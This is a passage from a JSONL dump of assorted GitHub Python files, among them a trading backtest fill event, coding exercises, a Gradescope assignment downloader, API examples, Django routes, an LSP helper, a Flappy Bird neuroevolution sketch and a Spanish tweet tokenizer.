order_id\n\t\tself.id = ObjectId() if id is None else id\n\t\tself.symbol = symbol\n\t\tself.exchange = exchange\n\t\tself.quantity = int(quantity)\n\t\tself.fill_type = fill_type\n\t\tself.fill_cost = fill_cost\n\n\t\t# Calculate commission\n\t\tif commission:\n\t\t\tself.commission = commission\n\t\telse:\n\t\t\tself.commission = self.calculate_commission()\n\n\n\tdef __lt__(self, other):\n\t\treturn not self.id < other.id\n\n\n\tdef __eq__(self, other):\n\t\treturn self.id == other.id\n\n\n\tdef __repr__(self):\n\t\treturn (\n\t\t\t'Fill: timestamp=%s, Symbol=%s, Exchange=%s, ' +\n\t\t\t'Quantity=%s, Fill Type=%s, ' +\n\t\t\t'Fill Cost=%s, Commission=%s' \n\t\t) % ( \n\t\t\tself.timestamp, self.symbol, self.exchange.value,\n\t\t\tself.quantity, self.fill_type.__name__,\n\t\t\tself.fill_cost, self.commission\n\t\t)\n\n\n\t@property\n\tdef timestamp(self):\n\t\treturn pd.Timestamp(self.id.generation_time)\n\n\n\t@abstractmethod\n\tdef calculate_commission(self):\n\t\traise NotImplementedError('Commission bases on different broker')\n\n\n\nclass FillEventIB(FillEvent):\n\tdef calculate_commission(self):\n\t\t\"\"\"\n\t\tCalculate the fees of trading based on Interactive Brokers\n\t\tBroker fee structure for API, in USD\n\n\t\tNotes\n\t\t-----\n\t\t- This does not include exchange or ECN fees\n\n\t\tReference\n\t\t---------\n\t\tBased on \"US API Directed Orders\":\n\t\thttps://www.interactivebrokers.com/en/index.php?f=commission&p=stocks2\n\t\t\"\"\"\n\t\tmin_cost = 1 # have it here, but I decide not to implement to on scale\n\t\tmax_cost = 0.005*self.fill_cost*self.quantity\n\t\tfull_cost = 0.005 * self.quantity\n\t\t\n\t\treturn min(full_cost, max_cost)\n\n\n\tdef as_dict(self):\n\t\treturn {\n\t\t\t'event_type': 'fill_ib',\n\t\t\t'data': {\n\t\t\t\t'id': str(self.id),\n\t\t\t\t'order_id': str(self.order_id),\n\t\t\t\t'symbol': self.symbol,\n\t\t\t\t'exchange': self.exchange.value[0].upper(),\n\t\t\t\t'quantity': self.quantity,\n\t\t\t\t'fill_type': self.fill_type.value,\n\t\t\t\t'fill_cost': self.fill_cost,\n\t\t\t\t'commission': self.commission,\n\t\t\t}\n\t\t}\n\t\n\t\n\t@classmethod\n\tdef from_dict(cls, **kws):\n\t\treturn cls(\n\t\t\tid=ObjectId(kws.get('id')),\n\t\t\torder_id=ObjectId(kws.get('order_id')),\n\t\t\tsymbol=kws.get('symbol'),\n\t\t\texchange=EXCHANGE_DICT[kws.get('exchange')],\n\t\t\tquantity=int(kws.get('quantity')),\n\t\t\tfill_type=FILL_DICT[kws.get('fill_type')],\n\t\t\tfill_cost=kws.get('fill_cost'),\n\t\t\tcommission=kws.get('commission'),\n\t\t)\n","repo_name":"webclinic017/pcm_backtest","sub_path":"event/fill.py","file_name":"fill.py","file_ext":"py","file_size_in_byte":3329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19882579120","text":"# matrix = [\r\n# [1, 2, 3],\r\n# [4, 5, 6],\r\n# [7, 8, 9]\r\n# ]\r\n#\r\n# for row in matrix:\r\n# for item in row:\r\n# print(item)\r\n\r\n# My answer\r\n# numbers = [5, 2, 1, 7, 4, 6, 8, 232, 67, 89, 69, 69, 4, 2, 6]\r\n# uniques = []\r\n# numbers.sort()\r\n# temp = numbers[0]\r\n# print(numbers)\r\n# for number in numbers:\r\n# if number != temp:\r\n# uniques.append(temp)\r\n# temp = number\r\n# print(uniques)\r\n\r\n# Correct Answer\r\nnumbers = [5, 2, 1, 7, 4, 6, 8, 232, 67, 89, 69, 69, 4, 2, 6]\r\nuniques = []\r\nfor number in numbers:\r\n if number not in uniques:\r\n uniques.append(number)\r\nprint(uniques)\r\n","repo_name":"Poyx15/Tutorials","sub_path":"Codecademy Practice/Python Syntax and Algorithm/2DLists.py","file_name":"2DLists.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"6948943536","text":"n = int(input())\ngraph = [list(map(int, input().split())) for _ in range(n)]\ndp = [[[0,0,0]]*(n+1) for _ in range(n+1)] # 가로, 세로, 대각선\ndp[1][1] = [0,0,0]\ndp[1][2] = [1,0,0]\nfor i in range(n):\n for j in range(n):\n if graph[i][j] == 1:\n dp[i+1][j+1] = [-1,0,0]\n\nsig = 0\nfor i in range(n): # 세로\n for j in range(n): # 가로\n if dp[i+1][j+1][0] == -1:\n continue\n if i == 0 and j == 1:\n continue \n\n if dp[i][j+1][0] == -1:\n sig = 1 # 위에가 막힘\n elif dp[i+1][j][0] == -1:\n sig = 2 # 왼쪽이 막힘\n elif dp[i][j][0] == -1:\n sig = 3 # 왼쪽대각 막힘\n else:\n sig = 0\n\n if sig == 1:\n dp[i+1][j+1] = [dp[i+1][j][0] + dp[i+1][j][2], 0, 0]\n elif sig == 2:\n dp[i+1][j+1] = [0,dp[i][j+1][1] + dp[i][j+1][2], 0]\n elif sig == 3:\n dp[i+1][j+1] = [dp[i+1][j][0] + dp[i+1][j][2], dp[i][j+1][1] + dp[i][j+1][2], 0]\n else:\n dp[i+1][j+1] = [dp[i+1][j][0] + dp[i+1][j][2], dp[i][j+1][1] + dp[i][j+1][2], sum(dp[i][j])]\n\n\nx = sum(dp[n][n])\nif x == -1:\n print(0)\nelse:\n print(x)\n\n# dfs 풀이\n\n# import sys\n# import copy\n# input = sys.stdin.readline\n# n = int(input())\n# graph = [list(map(int, input().split())) for _ in range(n)]\n# graph[0][0], graph[0][1] = 1,1\n# dx = [0,1,1]\n# dy = [1,0,1]\n# cnt = 0\n# def dfs(x,y, graph, state):\n# global cnt\n# if x == n-1 and y == n-1:\n# cnt += 1\n# return\n# for i in range(3):\n# if state == 'garo' and i == 1:\n# continue\n# if state == 'sero' and i == 0:\n# continue\n# new_graph = copy.deepcopy(graph)\n# nx = x + dx[i]\n# ny = y + dy[i]\n# if nx < n and ny < n:\n# if i == 2:\n# if graph[nx][ny] == 0 and graph[nx-1][ny] == 0 and graph[nx][ny-1] == 0:\n# new_graph[nx][ny] = 1\n# dfs(nx,ny, new_graph, 'degak')\n# else:\n# if graph[nx][ny] == 0:\n# new_graph[nx][ny] = 1\n# if i == 0:\n# dfs(nx,ny,new_graph, 'garo')\n# else:\n# dfs(nx,ny,new_graph, 'sero')\n\n# dfs(0,1, graph, 'garo')\n# print(cnt)\n\n","repo_name":"gyoseon123/baekjoon","sub_path":"python/17070.py","file_name":"17070.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1197470677","text":"import inquirer\nimport json\nimport httpx\nimport os\nimport bs4\nimport sys\nimport time\nimport pathvalidate\nfrom tqdm import tqdm\nfrom modules import getcourses\n\ndef massdownload():\n if os.path.exists(\"./jsons/cookies.json\"):\n with open('./jsons/config.json') as f:\n config = json.load(f)\n with open('./jsons/cookies.json') as f:\n cookies = json.load(f)\n if not os.path.exists(\"./downloads\"):\n os.mkdir(\"./downloads\")\n\n transport = httpx.HTTPTransport(retries=3) #high retry amount due to fickle nature of mass pdf downloading\n client = httpx.Client(cookies=cookies, headers={\"User-Agent\": config[\"User-Agent\"]}, transport=transport)\n\n courses = getcourses.getcourses()\n downloadList = []\n\n if len(courses) > 0:\n for item in courses:\n downloadList.append((item[1], item[0]))\n\n downloadQuestion = [\n inquirer.Checkbox(\n \"courses\",\n message=\"What courses do you want to archive?\",\n choices=downloadList,\n ),\n ]\n\n downloadAnswer = inquirer.prompt(downloadQuestion)\n if len(downloadAnswer) > 0:\n for course in downloadAnswer[\"courses\"]:\n url = \"https://www.gradescope.com/courses/\" + str(course)\n try:\n coursePage = client.get(url)\n cookies[\"_gradescope_session\"] = coursePage.cookies[\"_gradescope_session\"]\n except:\n print(\"Network error! Please try again later.\")\n sys.exit(1)\n if coursePage.status_code != 200:\n print(\"Account details are incorrect. Try deleting cookies.json and rerunning setup.py\")\n sys.exit(1)\n\n courseSoup = bs4.BeautifulSoup(coursePage.text, features=\"html.parser\")\n courseName = pathvalidate.sanitize_filepath(courseSoup.find(\"h1\", {\"class\": \"courseHeader--title\"}).text)\n assignmentLister = courseSoup.find(\"table\", {\"id\": \"assignments-student-table\"})\n assignmentList = assignmentLister.find(\"tbody\").findChildren(\"tr\")\n\n if len(assignmentList) > 0:\n print(courseName + \": (trying to download \" + str(len(assignmentList)) + \" assignments):\\n\")\n for item in assignmentList:\n linkSection = item.find(\"th\", {\"class\": \"table--primaryLink\"})\n if linkSection.find(\"a\"):\n downloadLink = \"https://www.gradescope.com\" + linkSection.find(\"a\")[\"href\"] + \".pdf\"\n fileName = downloadLink.split(\"/\")[-1]\n with client.stream(\"GET\", downloadLink, timeout=15) as r: #high timeout needed because gradescope doesn't prioritize file downloads!\n\n if not os.path.exists(\"./downloads/\" + courseName):\n os.mkdir(\"./downloads/\" + courseName)\n\n with open(\"./downloads/\" + courseName + \"/\" + fileName, \"wb\") as f:\n with tqdm(unit_scale=True, unit_divisor=1024, unit=\"B\", desc=fileName) as progress:\n num_bytes_downloaded = r.num_bytes_downloaded\n for data in r.iter_bytes():\n f.write(data)\n progress.update(r.num_bytes_downloaded - num_bytes_downloaded)\n num_bytes_downloaded = r.num_bytes_downloaded\n time.sleep(1) #high sleep value to not overload gradescope servers\n else:\n print(\"Could not find assignments to download.\")\n sys.exit(1)\n\n else:\n return(0) #user did not choose class, kick them out to main menu\n else:\n print(\"You don't have any Gradescope courses. Please add a course before using this script\")\n sys.exit(1)\n\n else:\n print(\"Cookies not saved. Please (re)run setup.py.\")\n sys.exit(1)","repo_name":"evilsaloon/Gradescope-Tools","sub_path":"modules/massdownload.py","file_name":"massdownload.py","file_ext":"py","file_size_in_byte":4400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"21534134387","text":"#make sure that you do the following command first if you haven't\n#pip3 install requests\n\n\nimport requests\n\ndef get_random_magic_card():\n # Define the Scryfall API URL for a random card\n scryfall_url = \"https://api.scryfall.com/cards/random\"\n\n # Send a GET request to the API\n response = requests.get(scryfall_url)\n\n # Check if the request was successful (status code 200)\n if response.status_code == 200:\n # Parse the JSON response\n card_data = response.json()\n\n # Extract and print relevant information about the card\n card_name = card_data[\"name\"]\n card_set = card_data[\"set_name\"]\n\n print(f\"Card Name: {card_name}\")\n print(f\"Set Name: {card_set}\")\n else:\n print(f\"Error: {response.status_code} - {response.text}\")\n\ndef get_magic_search():\n scryfall_url = \"https://api.scryfall.com/cards/search?q=t%3Acreature\"\n response = requests.get(scryfall_url)\n if response.status_code == 200:\n card_data = response.json()\n print(card_data[\"total_cards\"])\n else:\n print(f\"Error: {response.status_code} - {response.text}\")\n\n\n\nif __name__ == \"__main__\":\n get_random_magic_card()\n get_magic_search()\n","repo_name":"nzoam93/api-calls","sub_path":"python/scryfall-api-call.py","file_name":"scryfall-api-call.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"6343604768","text":"\n#%% Some function decorators for deprecation\nimport warnings\nimport functools\n\nimport functools\nimport inspect\nimport warnings\n\nstring_types = (type(b''), type(u''))\n\ndef deprecated(reason):\n \"\"\"\n @brief decorator for deprecating old functions \n @cite laurent laporte https://stackoverflow.com/questions/2536307/decorators-in-the-python-standard-lib-deprecated-specifically \n @param[in] reason - why its deprecated and what to do \n \"\"\"\n if isinstance(reason, string_types):\n\n # The @deprecated is used with a 'reason'.\n #\n # .. code-block:: python\n #\n # @deprecated(\"please, use another function\")\n # def old_function(x, y):\n # pass\n def decorator(func1):\n if inspect.isclass(func1):\n fmt1 = \"Call to deprecated class {name} ({reason}).\"\n else:\n fmt1 = \"Call to deprecated function {name} ({reason}).\"\n @functools.wraps(func1)\n def new_func1(*args, **kwargs):\n warnings.simplefilter('always', DeprecationWarning)\n warnings.warn(\n fmt1.format(name=func1.__name__, reason=reason),\n category=DeprecationWarning,\n stacklevel=2\n )\n warnings.simplefilter('default', DeprecationWarning)\n return func1(*args, **kwargs)\n return new_func1\n return decorator\n\n elif inspect.isclass(reason) or inspect.isfunction(reason):\n # The @deprecated is used without any 'reason'.\n #\n # .. code-block:: python\n #\n # @deprecated\n # def old_function(x, y):\n # pass\n func2 = reason\n if inspect.isclass(func2):\n fmt2 = \"Call to deprecated class {name}.\"\n else:\n fmt2 = \"Call to deprecated function {name}.\"\n @functools.wraps(func2)\n def new_func2(*args, **kwargs):\n warnings.simplefilter('always', DeprecationWarning)\n warnings.warn(\n fmt2.format(name=func2.__name__),\n category=DeprecationWarning,\n stacklevel=2\n )\n warnings.simplefilter('default', DeprecationWarning)\n return func2(*args, **kwargs) \n return new_func2\n\n else:\n raise TypeError(repr(type(reason)))\n\n\n#incomplete functino decorator\ndef incomplete(reason):\n \"\"\"\n @brief decorator for incomplete functions \n @param[in] reason - reason that its incomplete. Unlike deprecation this REQUIRES a reason \n \"\"\"\n def decorator(func1):\n if inspect.isclass(func1):\n fmt1 = \"Call to incomplete class {name} ({reason}).\"\n else:\n fmt1 = \"Call to incomplete function {name} ({reason}).\"\n @functools.wraps(func1)\n def new_func1(*args, **kwargs):\n warnings.simplefilter('always', UserWarning)\n warnings.warn(\n fmt1.format(name=func1.__name__, reason=reason),\n category=UserWarning,\n stacklevel=2\n )\n warnings.simplefilter('default', UserWarning)\n return func1(*args, **kwargs)\n return new_func1\n return decorator\n","repo_name":"Sheekaboom/WeissTools","sub_path":"WeissTools/generic/code_states.py","file_name":"code_states.py","file_ext":"py","file_size_in_byte":3261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72280746372","text":"\"\"\"\r\nExercise 7\r\nTwo words are anagrams if you can rearrange the letters from one to\r\nspell the other. Write a function called is_anagram that takes two\r\nstrings and returns True if they are anagrams.\r\n\"\"\"\r\n\r\n\r\ndef count_freq(slowo):\r\n slownik = dict()\r\n for x in slowo:\r\n if x not in slownik:\r\n slownik[x] = 1\r\n else:\r\n slownik[x] = slownik[x] + 1\r\n return slownik\r\n\r\n\r\ndef is_anagram(a, b):\r\n if count_freq(a) == count_freq(b):\r\n return True\r\n return False\r\n\r\n\r\nprint(is_anagram(\"kajak\", \"ajkak\"))\r\n","repo_name":"djeada/Think-Python","sub_path":"src/Chapter10/Exercise7.py","file_name":"Exercise7.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"6732605671","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Lexers, parsers, compilers, etc for OpenFisca source code\"\"\"\n\nfrom setuptools import setup, find_packages\n\n\nclassifiers = \"\"\"\\\nDevelopment Status :: 2 - Pre-Alpha\nLicense :: OSI Approved :: GNU Affero General Public License v3\nOperating System :: POSIX\nProgramming Language :: Python\nTopic :: Scientific/Engineering :: Information Analysis\n\"\"\"\n\ndoc_lines = __doc__.split('\\n')\n\n\nsetup(\n name = 'OpenFisca-Parsers',\n version = '1.0.2',\n author = 'OpenFisca Team',\n author_email = 'contact@openfisca.fr',\n classifiers = [classifier for classifier in classifiers.split('\\n') if classifier],\n description = doc_lines[0],\n keywords = 'benefit compiler lexer microsimulation parser social tax',\n license = 'http://www.fsf.org/licensing/licenses/agpl-3.0.html',\n long_description = '\\n'.join(doc_lines[2:]),\n url = 'https://github.com/openfisca/openfisca-parsers',\n\n install_requires = [\n 'Biryani[datetimeconv] >= 0.10.1',\n 'numpy >= 1.11',\n ],\n packages = find_packages(),\n )\n","repo_name":"openfisca/openfisca-parsers","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"41357053646","text":"from django.urls import include, path\nfrom rest_framework import permissions\n\nfrom .views import CompanyListApiView,CreateConnecttoCompanyView,CompanyapplicationApiView,CompanyapplicationEditView,CompanyProfileView,ListActivityOppScholarViewSet\nfrom .views import ListAllActivityOppScholarViewSet, ListUserActivityOppScholarViewSet\n\nurlpatterns = [\n # urls to send a application to be a company, connect to the company and company profile\n path(\"Company-users\",CompanyListApiView.as_view(),name=\"Company-users\"),\n path('SendRequestToCompany',CreateConnecttoCompanyView.as_view(),name='send_company_request'),\n path(\"Companyapplication\",CompanyapplicationApiView.as_view(),name=\"Companyapplication\"),\n path(\"Companyapplicationedit/\",CompanyapplicationEditView.as_view(),name=\"Companyapplicationedit\"),\n path(\"CompanyProfile/\",CompanyProfileView.as_view(),name=\"CompanyProfile\"),\n path('company-act-opp-sch-list', ListActivityOppScholarViewSet.as_view(),name='act-opp-sch-list'),\n path('all-act-opp-sch-list/', ListAllActivityOppScholarViewSet.as_view(),name='all-applications-list'),\n path('applications-list/', ListUserActivityOppScholarViewSet.as_view(),name='user-applications-list')\n]","repo_name":"KexunNiu/Cloned-pathfinder2","sub_path":"backend/company/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12156667786","text":"import numpy as np\n\nfrom metadata import train_lengths, device_ids\n\n\ndevice_features = np.loadtxt(open(\"features1.csv\",\"rb\"),delimiter=\",\")\nseq_features = np.loadtxt(open(\"sequence_features1.csv\",\"rb\"),delimiter=\",\")\n\n\nsubmission_file = open(\"submission1.csv\", 'a')\nsubmission_file.write(\"QuestionId,IsTrue\\n\")\n\n\ndef gaussian_probability(x, mean, std):\n return (1./(np.sqrt(2*np.pi)*std))*np.exp(-(((x - mean)/std)**2)/2)\n\nwith open(\"questions.csv\") as questions_file:\n temp = questions_file.readline()\n for line in questions_file:\n question_id, seq_id, dev_id = line.split(',')\n dev_id = dev_id[:-1]\n\n seq_id_int = int(seq_id)\n dev_id_int = int(dev_id)\n\n prob_x = gaussian_probability(seq_features[seq_id_int, 0], device_features[dev_id_int, 0], device_features[dev_id_int, 3])\n prob_y = gaussian_probability(seq_features[seq_id_int, 1], device_features[dev_id_int, 1], device_features[dev_id_int, 4])\n prob_z = gaussian_probability(seq_features[seq_id_int, 2], device_features[dev_id_int, 2], device_features[dev_id_int, 5])\n\n posterior = prob_x*prob_y*prob_z*train_lengths[device_ids.index(dev_id_int)]\n\n submission_file.write(question_id + \",\" + str(posterior)+'\\n')\n","repo_name":"sumeetfefar/kaggle-accelerometer-biometric","sub_path":"code/gen_submission1.py","file_name":"gen_submission1.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"38800778839","text":"import re\n\nfrom pygls.workspace import position_from_utf16\nfrom pygls.lsp.types import Range, Position\nfrom pygls.workspace import Document as PyglsDocument\n\nfrom ._base import Base\n\n\nclass Document(Base):\n def parse_range(\n self, start_line: int, start_char: int, end_line: int, end_char: int\n ):\n \"\"\"\n Parses something like `0:0,23:3` to produce a \"selection\" range in a document\n \"\"\"\n if self.text_doc_uri is None:\n raise Exception\n\n if int(end_line) == -1:\n current_document = self.get_current_document()\n end_line = len(current_document.lines)\n\n if int(end_char) == -1:\n # NB:\n # `end_char` may need to use something like pygls.workspace.utf16_num_units(lines[-1])\n # in order to handle wide characters. I have seen some weirdness like a single char\n # being copied on every save. But it's hard to know what's going on behind the scenes.\n end_char = 0\n\n return Range(\n start=Position(line=start_line, character=start_char),\n end=Position(line=end_line, character=end_char),\n )\n\n def range_for_whole_document(self) -> Range:\n \"\"\"\n `0:0,-1:1` has the special meaning of: select the whole document.\n\n This is not a LSP convention.\n \"\"\"\n return self.parse_range(0, 0, -1, -1)\n\n def get_current_document(self) -> PyglsDocument:\n if self.text_doc_uri is None:\n raise Exception\n\n return self.server.get_document_from_uri(self.text_doc_uri)\n\n def get_wordish_under_cursor(self, cursor_position: Position) -> str:\n \"\"\"\n Get anything between whitespace\n \"\"\"\n if self.text_doc_uri is None:\n raise Exception\n doc = self.server.get_document_from_uri(self.text_doc_uri)\n # Doesn't start with whitespace\n re_start_word = re.compile(r\"[^\\s]*$\")\n # Doesn't end with whitespace\n re_end_word = re.compile(r\"^[^\\s]*\")\n word = doc.word_at_position(\n cursor_position, re_start_word=re_start_word, re_end_word=re_end_word\n )\n return word\n\n def get_line_under_cursor(self, cursor_position: Position) -> str:\n if self.text_doc_uri is None:\n raise Exception\n doc = self.server.get_document_from_uri(self.text_doc_uri)\n lines = doc.lines\n if cursor_position.line >= len(lines):\n return \"\"\n\n row, _ = position_from_utf16(lines, cursor_position)\n line = lines[row]\n return line\n","repo_name":"tombh/super-glass-lsp","sub_path":"super_glass_lsp/lsp/custom/features/_document.py","file_name":"_document.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"44"} +{"seq_id":"74409285894","text":"import pygame\nimport random\nimport numpy as np\nimport tensorflow as tf\n\n# Define constants\nSCREEN_WIDTH, SCREEN_HEIGHT = 400, 600\nBIRD_WIDTH, BIRD_HEIGHT = 40, 40\nPIPE_WIDTH, PIPE_HEIGHT = 100, 300\nGRAVITY = 0.5\nPIPE_SPEED = 5\nBIRD_JUMP = -10\nNUM_GENERATIONS = 100\nNUM_BIRDS_IN_GENERATION = 100\n\n# Initialize Pygame\npygame.init()\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\npygame.display.set_caption(\"Flappy Bird\")\n\n# Define the neural network model\nmodel = tf.keras.Sequential([\n tf.keras.layers.Dense(24, activation='relu', input_shape=(4,)),\n tf.keras.layers.Dense(2, activation='linear')\n])\ndef crossover_and_mutate(parent1, parent2, mutation_rate=0.01):\n child_weights = []\n \n # Assuming parent1 and parent2 are Keras models\n for layer1, layer2 in zip(parent1.layers, parent2.layers):\n # Crossover (average weights)\n new_weights = (layer1.get_weights()[0] + layer2.get_weights()[0]) / 2.0\n \n # Mutation\n mask = np.random.rand(*new_weights.shape) < mutation_rate\n mutation = np.random.randn(*new_weights.shape) * 0.1 # Adjust the mutation scale as needed\n new_weights = np.where(mask, new_weights + mutation, new_weights)\n \n child_weights.append(new_weights)\n \n # Create a new model with the child weights\n child_model = tf.keras.models.clone_model(parent1)\n child_model.build((None, input_size)) # Assuming input_size is known\n \n for layer, weights in zip(child_model.layers, child_weights):\n layer.set_weights([weights])\n\n return child_model\n\ndef softmax(logits):\n exp_logits = np.exp(logits)\n return exp_logits / np.sum(exp_logits)\n# Define a function to create a new generation of birds\ndef create_new_generation():\n global model # Используем глобальную переменную модели\n\n # Оценка производительности каждой птицы (пример: доли, пройденной дистанции)\n bird_scores = []\n\n # Задайте вероятности выбора каждой птицы на основе их оценок\n selection_probabilities = softmax(bird_scores)\n\n # Создайте новое поколение птиц\n new_generation = []\n\n for _ in range(NUM_BIRDS_IN_GENERATION):\n # Выбор двух родительских птиц с использованием вероятностей\n parent1, parent2 = np.random.choice(NUM_BIRDS_IN_GENERATION, size=2, p=selection_probabilities)\n\n # Создание потомка птицы (нейронной сети) путем скрещивания и мутации\n child_model = crossover_and_mutate(model[parent1], model[parent2])\n\n # Добавление потомка в новое поколение\n new_generation.append(child_model)\n\n # Обновление модели для нового поколения птиц\n model = new_generation\n\n# Main game loop\ndef main():\n bird_x = SCREEN_WIDTH // 4\n bird_y = SCREEN_HEIGHT // 2\n bird_velocity = 0\n pipes = []\n\n for generation in range(NUM_GENERATIONS):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n bird_velocity = BIRD_JUMP\n\n # Move bird\n bird_y += bird_velocity\n bird_velocity += GRAVITY\n\n # Generate pipes\n if len(pipes) == 0 or pipes[-1][\"x\"] < SCREEN_WIDTH - 200:\n pipe_height = random.randint(100, 400)\n pipes.append({\"x\": SCREEN_WIDTH, \"height\": pipe_height})\n\n # Move pipes\n for pipe in pipes:\n pipe[\"x\"] -= PIPE_SPEED\n\n # Remove off-screen pipes\n pipes = [pipe for pipe in pipes if pipe[\"x\"] > -PIPE_WIDTH]\n\n # Check for collisions\n for pipe in pipes:\n if bird_x < pipe[\"x\"] + PIPE_WIDTH and bird_x + BIRD_WIDTH > pipe[\"x\"]:\n if bird_y < pipe[\"height\"] or bird_y + BIRD_HEIGHT > pipe[\"height\"] + PIPE_HEIGHT:\n bird_x = SCREEN_WIDTH // 4\n bird_y = SCREEN_HEIGHT // 2\n bird_velocity = 0\n pipes = []\n create_new_generation()\n break\n\n # Draw everything\n screen.fill((255, 255, 255))\n pygame.draw.rect(screen, (0, 128, 0), (bird_x, bird_y, BIRD_WIDTH, BIRD_HEIGHT))\n for pipe in pipes:\n pygame.draw.rect(screen, (0, 0, 0), (pipe[\"x\"], 0, PIPE_WIDTH, pipe[\"height\"]))\n pygame.draw.rect(screen, (0, 0, 0), (pipe[\"x\"], pipe[\"height\"] + PIPE_HEIGHT, PIPE_WIDTH, SCREEN_HEIGHT))\n pygame.display.update()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"fluke8/neuro-race-python","sub_path":"trash/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":4879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"31413853233","text":"import re\nimport string\nimport stanza\nfrom spacy_stanza import StanzaLanguage\nfrom nltk.tokenize import TweetTokenizer\nfrom nltk.corpus import stopwords\n\nclass TextCleaner:\n nlp = {}\n \n def __init__(self):\n snlp = stanza.Pipeline(lang=\"es\")\n self.nlp = StanzaLanguage(snlp)\n \n # Calls the clean function and tokenizes specially for Tweets (removes mentions, keep hashtags)\n def tokenize_tweet(self, tweet, hashtags):\n tknzr = TweetTokenizer(strip_handles=True)\n tweet_no_hashtag = tweet\n for hashtag in hashtags:\n tweet_no_hashtag = tweet_no_hashtag.replace('#' + hashtag[\"text\"], '')\n cleaned_tweet = self.clean_text(tweet_no_hashtag)\n return tknzr.tokenize(cleaned_tweet)\n \n # Checks if the given character is punctuation or not, excluding Twitter special chaarcters (@, #)\n def is_not_punctuation(self, char):\n is_punctuation = char not in string.punctuation.join([\"¡\", \"¿\", \"–\", \"“\", \"”\", \"¨\", \"•\", \"<\", \">\", \"…\", \"‘\", \"’\", \"«\", \"»\"])\n return is_punctuation or char == \"@\"\n \n # Removes numbers, emojis, punctuation, whitespaces and lowers all characters\n def clean_text(self, text):\n # remove numbers\n \n text_nonum = re.sub(r'\\d+', '', text)\n # remove emojis\n regrex_pattern = re.compile(pattern=\"[\"\n u\"\\U0001F600-\\U0001F64F\" # emoticons\n u\"\\U0001F300-\\U0001F5FF\" # symbols & pictographs\n u\"\\U0001F680-\\U0001F6FF\" # transport & map symbols\n u\"\\U0001F1E0-\\U0001F1FF\" # flags (iOS)\n u\"\\U00002500-\\U00002BEF\" # chinese char\n u\"\\U00002702-\\U000027B0\"\n u\"\\U000024C2-\\U0001F251\"\n u\"\\U0001f926-\\U0001f937\"\n u\"\\U00010000-\\U0010ffff\"\n u\"\\u2640-\\u2642\"\n u\"\\u2600-\\u2B55\"\n u\"\\u200d\"\n u\"\\u23cf\"\n u\"\\u23e9\"\n u\"\\u231a\"\n u\"\\ufe0f\" # dingbats\n u\"\\u3030\"\n u\"\\u003E\"\n u\"\\u003C\"\n u\"\\u200b\"\n \"]+\", flags=re.UNICODE)\n text_noemoji = regrex_pattern.sub(r'', text_nonum)\n # remove punctuations and convert characters to lower case\n text_nopunct = \"\".join([char.lower() for char in text_noemoji if self.is_not_punctuation(char)])\n # substitute multiple whitespace with single whitespace\n # Also, removes leading and trailing whitespaces\n text_no_doublespace = re.sub('\\s+', ' ', text_nopunct).strip()\n return text_no_doublespace\n \n # Removes stopwords based on nltk spanish stopwords and https://github.com/stopwords-iso/stopwords-es/blob/master/stopwords-es.txt\n def remove_stopwords(self, tweet, hashtags):\n tokens = self.tokenize_tweet(tweet, hashtags)\n return [token for token in tokens if not token in stopwords.words('spanish2') and \"http\" not in token and \"gt\" not in token and \"lt\" not in token]\n \n # Lemmatizes the remaining words, based on stanza's spanish NLP and using spacy-stanza NLP\n def lemmatize(self, tweet, hashtags):\n tokens = self.remove_stopwords(tweet, hashtags)\n for i in range(0, len(tokens)):\n if not tokens[i].startswith(\"#\"):\n doc = self.nlp(tokens[i])\n for token in doc:\n if token.lemma_ not in stopwords.words(\"spanish2\"):\n tokens[i] = token.lemma_\n print(tokens)\n return tokens\n ","repo_name":"jfmendez11/tweet_miner","sub_path":"tweet_tokenizer.py","file_name":"tweet_tokenizer.py","file_ext":"py","file_size_in_byte":3880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1592271307","text":"#!/usr/bin/env python3\n\nimport configparser\nimport json\nimport sys\n\n\nc = configparser.ConfigParser(allow_no_value=True)\nwith open(sys.argv[1], 'r') as f:\n c.read_file(f)\n\nfor s in c.sections():\n for o in c.options(s):\n j = json.loads(c.get(s, o))\n\nc.write(sys.stdout)\n","repo_name":"renatahodovan/picireny","sub_path":"tests/resources/sut-inijson-load.py","file_name":"sut-inijson-load.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"44"} +{"seq_id":"41694169744","text":"import tensorflow as tf\n\n\nx = tf.constant(-2.0, name='x', dtype=tf.float32)\na = tf.constant(5.0, name='a', dtype=tf.float32)\nb = tf.constant(13.0, 